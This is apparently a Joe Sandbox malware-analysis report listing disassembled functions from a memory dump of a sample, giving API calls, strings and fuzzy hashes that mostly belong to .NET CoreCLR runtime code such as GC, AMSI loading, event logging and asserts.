Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: AddressProc$FreeHeapstrcmp
String ID: Microsoft-DotNETCore-SampleProfiler$timeBeginPeriod$timeEndPeriod$winmm.dll
API String ID: 974609388-753872048
Opcode ID: faf913845dbca60304a6d660f835b39ca616ad236594da99ef38ade7f5367fe1
Instruction ID: fa976b60b255a5c28dd0d58b493050c512a5704ce96d71acc922c923b865bed0
Opcode Fuzzy Hash: faf913845dbca60304a6d660f835b39ca616ad236594da99ef38ade7f5367fe1
Instruction Fuzzy Hash: CE71B031604321DFEB24EF29EC91B2A77A2BF84710F144639F9459B3A1DB35D950CBA4

Function 007773A0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 180libraryloadermemoryCOMMON

Download Yara Rule

APIs

wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000002,0343A378,0343A376,00000004,00000000,BBFE6088,00000000,00000000), ref: 007774A0
HeapFree.KERNEL32(00000000,00000000,00000000,BBFE6088,00000000,00000000), ref: 0077756B
GetLastError.KERNEL32(00000000,BBFE6088,00000000,00000000), ref: 00777575
GetProcAddress.KERNEL32(00000000,GC_VersionInfo), ref: 007775B4

Part of subcall function 0071F1C0: HeapFree.KERNEL32(00000000,?,80131623,?,?,00000002), ref: 0071F1FD

GetProcAddress.KERNEL32(00000000,GC_Initialize), ref: 00777606

Strings

GC_VersionInfo, xrefs: 007775A8
GC_Initialize, xrefs: 00777600

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: AddressFreeHeapProc$ErrorLastwcscpy_s
String ID: GC_Initialize$GC_VersionInfo
API String ID: 2550415743-311598099
Opcode ID: 0792fd43c7c73e2bca5372451ef884c01518313b3235af0205a4d1d119543728
Instruction ID: 6595e0338be2cdabbacb747040d48084f5177bf0a492b760f4e5e88a53ba03bd
Opcode Fuzzy Hash: 0792fd43c7c73e2bca5372451ef884c01518313b3235af0205a4d1d119543728
Instruction Fuzzy Hash: 0771AE71904218DBDB25DF28CC497EDB7B4EF49310F108298E959A7290DB789F94CF91

Function 008D7240 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 145libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,AmsiInitialize), ref: 008D72F9
GetProcAddress.KERNEL32(00000000,AmsiScanBuffer), ref: 008D732B
LeaveCriticalSection.KERNEL32(00000000,BBFE6088,0000002C,00000000,00000024), ref: 008D7358

Part of subcall function 0072F5E0: DeleteCriticalSection.KERNEL32(00000000,?,BBFE6088,00DB17A4,80004005), ref: 0072F628
Part of subcall function 0072F5E0: HeapFree.KERNEL32(00000000,00000000,BBFE6088,00DB17A4,80004005,?,?,?,?,?,?,?,?,00000000,00C4C725,000000FF), ref: 0072F64D

Strings

AmsiInitialize, xrefs: 008D72F3
amsi.dll, xrefs: 008D72E3
AmsiScanBuffer, xrefs: 008D7325
coreclr, xrefs: 008D7311

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: AddressCriticalProcSection$DeleteFreeHeapLeave
String ID: AmsiInitialize$AmsiScanBuffer$amsi.dll$coreclr
API String ID: 2465865910-2862599151
Opcode ID: b21fa3cf67624fb7f3b95f92ffe28ca3158e03763cb5ab7c60f225282edc60f6
Instruction ID: d1356c2648f4902b9d678ee125fee2b9ec208d7aba7c3d18be91fb5f06086eee
Opcode Fuzzy Hash: b21fa3cf67624fb7f3b95f92ffe28ca3158e03763cb5ab7c60f225282edc60f6
Instruction Fuzzy Hash: 0951C271A08755DBDB288F69DC447AEBBB4FB44714F50422AEC05E3391EB759C009BA4

Function 00A2E7B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00DB06B0,00000000,00000000,00DB06B0,?,00A2C4E9,00000000,00000000,00000000,00000000,00000000), ref: 00A2E7C4
HeapAlloc.KERNEL32(03400000,00000000,00000030,00DB06B0,00000000,00000000,00DB06B0,?,00A2C4E9,00000000,00000000,00000000,00000000,00000000), ref: 00A2E7E1
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-DotNETCore-SampleProfiler,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00A27B96,00000000,00000000), ref: 00A2E823
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00A27B96,00000000,00000000), ref: 00A2E8CD

Part of subcall function 00A276E0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Microsoft-DotNETCore-SampleProfiler,000000FF,00000000,00000000,00000000,Microsoft-DotNETCore-SampleProfiler,00DB06B0,00A2E83A), ref: 00A276F7
Part of subcall function 00A276E0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A27B96,00000000), ref: 00A27707
Part of subcall function 00A276E0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Microsoft-DotNETCore-SampleProfiler,000000FF,00000000,00000000), ref: 00A27722
Part of subcall function 00A276E0: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A27B96), ref: 00A2772D

Part of subcall function 00A268B0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C,00A2FC07,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00A2F10E), ref: 00A268B2

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00A27B96,00000000,00000000), ref: 00A2E8EF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00A27B96,00000000,00000000), ref: 00A2E900

Strings

Microsoft-DotNETCore-SampleProfiler, xrefs: 00A2E822

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: free$ByteCharHeapMultiWidemalloc$AllocProcess_strdup
String ID: Microsoft-DotNETCore-SampleProfiler
API String ID: 2807844882-2073707973
Opcode ID: b71cf1dccbc1dca01873e0d77b9296bb2047b81aa8e0e26bf213b8ee8572cde8
Instruction ID: 74f38b471809af865b0f4d53d4630c1066444b44923c49b98b96c901ac751f27
Opcode Fuzzy Hash: b71cf1dccbc1dca01873e0d77b9296bb2047b81aa8e0e26bf213b8ee8572cde8
Instruction Fuzzy Hash: E041C371B05622ABE725EF69F844B1AB7A4FF44314F044139E905CB780EB71E990CBE5

Function 009749C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

Part of subcall function 009747A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(BBFE6088,?,00000000,00004000), ref: 0097480E
Part of subcall function 009747A0: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 00974822
Part of subcall function 009747A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0097482E
Part of subcall function 009747A0: HeapFree.KERNEL32(00000000,00000000), ref: 00974852

towlower.API-MS-WIN-CRT-STRING-L1-1-0(00000043,00000000,?,?,?,?,00B75A14,BBFE6088,BBFE6088,?,?,00000000), ref: 009749DE
towlower.API-MS-WIN-CRT-STRING-L1-1-0(00000044,?,?,?,?,00B75A14,BBFE6088,BBFE6088,?,?,00000000), ref: 009749EA
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00B75A14,BBFE6088,BBFE6088,?,?,00000000), ref: 009749FA
towlower.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,?,?,00B75A14,BBFE6088,BBFE6088,?,?,00000000), ref: 00974A21

Part of subcall function 0097D080: LCMapStringEx.KERNEL32(00D00A50,00000200,00000003,00000001,?,00000001,00000000,00000000,00000000,00000000,?,00000000), ref: 0097D115
Part of subcall function 0097D080: LCMapStringEx.KERNEL32(00D00A50,00000200,00000003,00000001,?,00000001,00000000,00000000,00000000), ref: 0097D167

FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,?,00B75A14,BBFE6088,BBFE6088,?,?,00000000), ref: 00974B20

Strings

DOTNET_, xrefs: 00974ABA
COMPlus_, xrefs: 00974A7E

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: towlower$EnvironmentFreeStringStrings_errno$Heapwcstoul
String ID: COMPlus_$DOTNET_
API String ID: 1934250108-1316173318
Opcode ID: 0538c08e990bf62a9288288897cae6d3fc1f92a33d0ca11b1b2fe735abf7ee6d
Instruction ID: 4cf202f9bb9614d6cb85168f5a7db1f2c576ee81c0dd8d4f55afda72dffcfd7f
Opcode Fuzzy Hash: 0538c08e990bf62a9288288897cae6d3fc1f92a33d0ca11b1b2fe735abf7ee6d
Instruction Fuzzy Hash: 7141C376A40116EBDB24AB989811BFFB7B9EF54700F848055E949DB282EB70DE40C764

Function 008384C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(BBFE6088,?,00000000), ref: 008384F2
_swprintf.LIBCMT ref: 00838529
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00838569
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 008385EA

Part of subcall function 0071D720: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,ResumeThread,?,0083858C), ref: 0071D74B

MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,000000FF,00000000,00000000), ref: 008385A4

Strings

ResumeThread, xrefs: 0083851D
%s failed with error %u. Handle: 0x%p, xrefs: 0083851E

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ByteCharFreeHeapMultiWide$ErrorLast_swprintf
String ID: %s failed with error %u. Handle: 0x%p$ResumeThread
API String ID: 378439020-1438827283
Opcode ID: 651912f9fd5d42bbecc8d537eb3ce6594269e22d6f5c161f8641ce8e0e2d40f6
Instruction ID: 675351b64fbab9d8e117885fdcaccb3011c62be55eef9f4a80371fbdc0b1b62a
Opcode Fuzzy Hash: 651912f9fd5d42bbecc8d537eb3ce6594269e22d6f5c161f8641ce8e0e2d40f6
Instruction Fuzzy Hash: 0F31C171A01368AFE7309B65DC4AFABBBB8FB45760F500269F419E72C0DB745A04CB90

Function 008DC910 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegisterEventSourceW.ADVAPI32(00000000,.NET Runtime), ref: 008DC98A
GetLastError.KERNEL32(?,?,?,008293AF), ref: 008DC996
ReportEventW.ADVAPI32(00000000,00000001,00000000,000003FF,00000000,00000001,00000000,00DA3158,00000000), ref: 008DC9B2
GetLastError.KERNEL32(?,?,?,008293AF), ref: 008DC9BA
DeregisterEventSource.ADVAPI32(00000000), ref: 008DC9C3

Strings

EventReporter::Report: Event log is full, corrupt or not enough memory to process., xrefs: 008DC9FD
.NET Runtime, xrefs: 008DC983

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Event$ErrorLastSource$DeregisterRegisterReport
String ID: .NET Runtime$EventReporter::Report: Event log is full, corrupt or not enough memory to process.
API String ID: 2240410200-2109140546
Opcode ID: a97df0d0f75ae4174a3a7cd6e5a3b152a574e3a33b673db5ead3addb0e7923a0
Instruction ID: e87b5b658f4823c7088fab6421f842a30092acc3522e74832a3015f8ea67fe3a
Opcode Fuzzy Hash: a97df0d0f75ae4174a3a7cd6e5a3b152a574e3a33b673db5ead3addb0e7923a0
Instruction Fuzzy Hash: 93214971B0821677E7205769CC95B3D7B95EB84754F140237EA0DE73C0E9B5DC00D654

Function 00A2FAE0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,00000000,?,?,00A2804A,80020139,00000000,00000000,?,?,?,?,?,?,00A28295,?), ref: 00A2FAF3
HeapAlloc.KERNEL32(03400000,00000000,00000018,?,00000000,?,?,00A2804A,80020139,00000000,00000000), ref: 00A2FB10
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntimeRundown,?,00A2804A,80020139,00000000,00000000,?,?,?,?,?,?,00A28295,?,?,BBFE6088), ref: 00A2FB4B
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00A2804A,?,00A2804A,80020139,00000000,00000000,?,?,?,?,?,?,00A28295,?,?,BBFE6088), ref: 00A2FB62
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,?,00A28295,?,?,BBFE6088,?,00000000), ref: 00A2FB7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,?,00A28295,?,?,BBFE6088,?,00000000), ref: 00A2FB8A

Strings

Microsoft-Windows-DotNETRuntimeRundown, xrefs: 00A2FB4A

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap_strdupfree$AllocProcess
String ID: Microsoft-Windows-DotNETRuntimeRundown
API String ID: 3838182309-930870680
Opcode ID: f69edd9deb8b6da6f4821cddb0183ec6e384184f8877c07f62685af1821141f0
Instruction ID: 272fce714fdb29fcbfab9ed340cd8717b343eef5d4bba12521c61228f631a0d6
Opcode Fuzzy Hash: f69edd9deb8b6da6f4821cddb0183ec6e384184f8877c07f62685af1821141f0
Instruction Fuzzy Hash: 13217C71B047559FE7208F2AFC54B1AB7E8EF94324B04863AE849C7740EB71E9548AA1

Function 00828520 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,Error 0x%08x.BreakOnBadExit: returning bad exit code.,80131506,80131506,?), ref: 008285C0
DebugBreak.KERNEL32 ref: 008285D2
GetCurrentProcess.KERNEL32(80131506,80131506,?), ref: 008285F3
TerminateProcess.KERNEL32(00000000), ref: 008285FA
ExitProcess.KERNEL32 ref: 0082860B

Strings

Error 0x%08x.BreakOnBadExit: returning bad exit code., xrefs: 008285B9
SafeExitProcess: exitCode = %d sca = %d, xrefs: 0082853F

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Process$BreakCurrentDebugExitTerminate__acrt_iob_func
String ID: Error 0x%08x.BreakOnBadExit: returning bad exit code.$SafeExitProcess: exitCode = %d sca = %d
API String ID: 4023824191-4137208948
Opcode ID: 709f279c69227372d1066e1ae9a45e2dc04b05b22bde978f843878fee0d0522a
Instruction ID: 11642315afe9a44928d69d25f65ba7543054f5f9d41ad0b02b9d03da39431cd4
Opcode Fuzzy Hash: 709f279c69227372d1066e1ae9a45e2dc04b05b22bde978f843878fee0d0522a
Instruction Fuzzy Hash: 1721C871601210EBDF20A729ED4AB9A7798EF81701F044468FC09D7292EFB99985C7A6

Function 009845D0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77threadCOMMON

Download Yara Rule

APIs

Part of subcall function 009844B0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00984553
Part of subcall function 009844B0: HeapFree.KERNEL32(00000000,00000000,BBFE6088), ref: 00984587

GetCurrentThreadId.KERNEL32 ref: 0098462C
GetCurrentThreadId.KERNEL32 ref: 00984633
GetCurrentProcessId.KERNEL32(00000000,?,007D8F0E,(BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart > (ptrdiff_t)0,BBFE6088,00000000), ref: 0098463A
GetCurrentProcessId.KERNEL32(00000000,?,007D8F0E,(BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart > (ptrdiff_t)0,BBFE6088,00000000), ref: 00984641

Part of subcall function 009807C0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00D00B01,000000FF,00000000,00000000,BBFE6088), ref: 0098082A
Part of subcall function 009807C0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,00D00B01,000000FF,00000000,00000000,00000000), ref: 0098085F
Part of subcall function 009807C0: OutputDebugStringW.KERNEL32(00000000), ref: 00980874
Part of subcall function 009807C0: HeapFree.KERNEL32(00000000,00000000), ref: 00980894

Part of subcall function 00757DE0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,00D026D0,0098467B,00D026D0,00000000), ref: 00757DE8

Strings

ASSERT:%s, line:%d, xrefs: 00984690
CLR: Assert failure(PID %d [0x%08x], Thread: %d [0x%x]): %s File: %s, Line: %d Image:%s, xrefs: 0098464B
D:\a\_work\1\s\src\coreclr\vm\threads.cpp, xrefs: 00984628, 0098468F

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Current$ByteCharFreeHeapMultiProcessThreadWide$DebugFileModuleNameOutputString__acrt_iob_func
String ID: ASSERT:%s, line:%d$CLR: Assert failure(PID %d [0x%08x], Thread: %d [0x%x]): %s File: %s, Line: %d Image:%s$D:\a\_work\1\s\src\coreclr\vm\threads.cpp
API String ID: 700304197-3825138699
Opcode ID: 66197bc79fd77d4e38c2dbea0aa1ab731d8bc936f2bc07597616043e4febf47d
Instruction ID: 62452391f779f73c9382bbd0d9731e3d4be537aec0fbae94a4f2b7e412e3bb24
Opcode Fuzzy Hash: 66197bc79fd77d4e38c2dbea0aa1ab731d8bc936f2bc07597616043e4febf47d
Instruction Fuzzy Hash: 0B11CD71910154EBCB15FBA5EC4EFDE7A7CAF95B00F400028F406A22D2EE685A488B71

Function 0071E170 Relevance: 12.2, APIs: 8, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,BBFE6088,034372E0,00000000), ref: 0071E226
HeapFree.KERNEL32(00000000,?,BBFE6088,034372E0,00000000), ref: 0071E23F
DeleteCriticalSection.KERNEL32(?,?,BBFE6088,034372E0,00000000), ref: 0071E299
DeleteCriticalSection.KERNEL32(?,?,BBFE6088,034372E0,00000000), ref: 0071E2D9
DeleteCriticalSection.KERNEL32(?,?,BBFE6088,034372E0,00000000), ref: 0071E319
DeleteCriticalSection.KERNEL32(?,?,BBFE6088,034372E0,00000000), ref: 0071E356
DeleteCriticalSection.KERNEL32(?,?,BBFE6088,034372E0,00000000), ref: 0071E393
DeleteCriticalSection.KERNEL32(?,?,BBFE6088,034372E0,00000000), ref: 0071E3D6

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalDeleteSection$FreeHeap
String ID:
API String ID: 447823528-0
Opcode ID: 4ad4f0442125423d15d224f5fdb7b41b9fedda652d936443fe7276893743eeb1
